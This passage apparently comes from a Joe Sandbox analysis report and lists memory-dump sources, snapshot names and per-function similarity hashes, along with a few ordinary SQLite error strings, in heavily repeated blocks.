                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BINARY$f
                                                                                                                                                                                                          • API String ID: 0-3633891179
                                                                                                                                                                                                          • Opcode ID: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                          • Instruction ID: c1bc1e11ad002a7c220d8d8e7df4b78c9037c1747443189ff404de5352f70210
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB2B372B2A6C28AEB548B15D560FB97BA2FBC4B84F514135CE6D437E9DF39D8108B00
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                          • Opcode ID: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                                          • Instruction ID: 7dea405c563583885411f098c936ba033fe073f1aac651b6e33eb8aa009bff38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e79b72e8b79be243d44fe629eb2a3a90386f5c847bdc0db6c38668ba5c18dd31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F325136B29A4386EB14CF26D460A6D37A1FBC4BA8F158031DE2D477A8DF39E845C740
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                                                          • Opcode ID: 72693b367b06d973c6b9c9c036ff7499f212e3846da383bcbde54d42566cdc3a
                                                                                                                                                                                                          • Instruction ID: fe6ee5b6d7d1bd3588cf660a7cdc58ae69172e558f9d538ca12300f32f23746d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72693b367b06d973c6b9c9c036ff7499f212e3846da383bcbde54d42566cdc3a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04B18D73625B868BEB15CF2AD4967683BA0F784B4CF258921DB6D837B8CB39D451C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: G$fts5 expression tree is too large (maximum depth %d)
                                                                                                                                                                                                          • API String ID: 0-1043253150
                                                                                                                                                                                                          • Opcode ID: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                                          • Instruction ID: 686276d54e78d9e4fbd85a8af4597883b6e30afb3cb1a9cbad47bc2b3c3c0477
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dacaa6d403f56b6151e330b83b0a2136c88c759f46f1e11ad4bfe2d02e929b9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B025966B1AB9386EB598B219464A7937A1FF84B84F044131DE6E477F8DF3CE441CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Expression tree is too large (maximum depth %d)
                                                                                                                                                                                                          • API String ID: 0-1961352115
                                                                                                                                                                                                          • Opcode ID: cf4d2b060202b4fac26406c1fe31d323e6442c4fd7334bfeab7a7d2057da9998
                                                                                                                                                                                                          • Instruction ID: d561dbdcf0e4f092b5f107430ecfebd6d2983f81b7348cadba9ed4d7ef0d3b7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf4d2b060202b4fac26406c1fe31d323e6442c4fd7334bfeab7a7d2057da9998
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C692D132B0A7828AEB648F16D168A7977A6FB44B84F145136CE6D47FF8DF38E4518340
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                          • API String ID: 0-914542581
                                                                                                                                                                                                          • Opcode ID: 18c7ddb846d5a90eebff2c09496e37c24145122c6b532d2ebefeb663f532584d
                                                                                                                                                                                                          • Instruction ID: 7d797b421515bdc9326246d3e29b80c44e97a14dc7d2bdf772167d16277df1f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18c7ddb846d5a90eebff2c09496e37c24145122c6b532d2ebefeb663f532584d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D452D362B0F34786FBA49B29D964B7A76999F14F84F054034CA2D4B7FAEE6DF4408300
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Expression tree is too large (maximum depth %d)
                                                                                                                                                                                                          • API String ID: 0-1961352115
                                                                                                                                                                                                          • Opcode ID: 77cb86a99b5286e291e6b306d03447c96223d5616abf0f58351c88537f9ff38a
                                                                                                                                                                                                          • Instruction ID: 38c633c2f02c720517a235f2a6e65236ff9f5638f7bd084fdfe1a7e120a3315a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77cb86a99b5286e291e6b306d03447c96223d5616abf0f58351c88537f9ff38a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD62BC72B1AB828AEB54CF25E064BA937A5FB49B88F144135DE5D477B8DF38E490C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: pB
                                                                                                                                                                                                          • API String ID: 0-391045240
                                                                                                                                                                                                          • Opcode ID: dd5b8c853646cadc51bab1ecafc56bd412825ebbd581d107eca3015a706500e2
                                                                                                                                                                                                          • Instruction ID: b8be2dae7d02c0887389bac908a9628843cb4985eb7b5237057a9d17dedc4c9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd5b8c853646cadc51bab1ecafc56bd412825ebbd581d107eca3015a706500e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13525C62B1AB4786EB548F15E460A79B7A1FB84BC8F054136DA6E47BB8DF3CE441C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: pB
                                                                                                                                                                                                          • API String ID: 0-391045240
                                                                                                                                                                                                          • Opcode ID: 9bc23aa9b3a38b3d3ab5694fa9bd82372c614e88292ec683c6f88b9b978bbc4c
                                                                                                                                                                                                          • Instruction ID: 72afafc76b2550e3bcc7d1f9c04b00779c23fc233ea963a8159af8b2b7a4dbd9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bc23aa9b3a38b3d3ab5694fa9bd82372c614e88292ec683c6f88b9b978bbc4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF422962B2BB4B86EB548F25A964A7923A1FF84BC4F094035C96E577BCDF3CE4018740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                          • Opcode ID: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                                          • Instruction ID: 37179782829b33fa0c6b3862ed7bfe89bf1693f5b7cc7c26b987b36b570bbe5d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d1d8df20a067cdd600f4e3829427086ed0d9efb72d7c63e22abf0cf9beb3e2a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E320322F0EB8385E7249B25A060A797391FF95B84F194232DE7E172F9DF2CE4418B00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: VUUU
                                                                                                                                                                                                          • API String ID: 0-2040033107
                                                                                                                                                                                                          • Opcode ID: d2c0a59ba29e9a2d7aa5d55e4fb8c484691047d8220697a3e4a254c9517e023e
                                                                                                                                                                                                          • Instruction ID: 357f7e56ce625bd7961c718630cba1af812fcf56d39b5469005946a572b54624
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c0a59ba29e9a2d7aa5d55e4fb8c484691047d8220697a3e4a254c9517e023e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08222A73B09BC686D751CB29D050ABEB7A0FB98784F458226DA9E13775DF38E085CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: corrupt database
                                                                                                                                                                                                          • API String ID: 0-2831454312
                                                                                                                                                                                                          • Opcode ID: d3e55e4c6d4a67b41a3897b1513796e20acfce59d67d4a22feed334fcd2445d9
                                                                                                                                                                                                          • Instruction ID: be4fb8c7d012d84d37a619ec6df38a65a8bb8558b403ef41a680d58620371e30
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3e55e4c6d4a67b41a3897b1513796e20acfce59d67d4a22feed334fcd2445d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20D1DD72B29A828AD760DF15D450BA97BA1FBC4F84F148135CEAE477A9DF38D441CB10
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: -- %s
                                                                                                                                                                                                          • API String ID: 0-3029982666
                                                                                                                                                                                                          • Opcode ID: 7ce2d2362a8e217d94496e001877c0c360667a66af628a0519e4094cc603a056
                                                                                                                                                                                                          • Instruction ID: 373cb3765dba371159fc1a2ddc8f2ec29d115df2f895320a0cbe6f2b23bd8ee2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ce2d2362a8e217d94496e001877c0c360667a66af628a0519e4094cc603a056
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73A1C07271AB8286EB509B259464FAA77A1FB85FC4F554135DE6E0BBFDCE38D0028700
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cc9b9cca91f9494c86089bc6c4b0b47c2ca4107ca2d9a4c368375dc7d0c33695
                                                                                                                                                                                                          • Instruction ID: 7ac477619197ce6774af705054bcc64eae31981d47a73fe61230a86c0e962e27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc9b9cca91f9494c86089bc6c4b0b47c2ca4107ca2d9a4c368375dc7d0c33695
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F272A032B1AB82C6EB10CF15D550AAD77A4FB98B84F158235DE6D0B7A9EF38E551C300
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 457934baa929486714a17a5ca9fd70becba9d31f0bde20f4ca805f225715c961
                                                                                                                                                                                                          • Instruction ID: efae489e614b0c977d5ecedfb9e2e340f3871225f4d78f49014600fcaa3d0fe2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 457934baa929486714a17a5ca9fd70becba9d31f0bde20f4ca805f225715c961
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4862AD72B09B928AE760CF25C450BBD7BA0FB44B89F218035DA5D5BBA9DF78E441C740
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
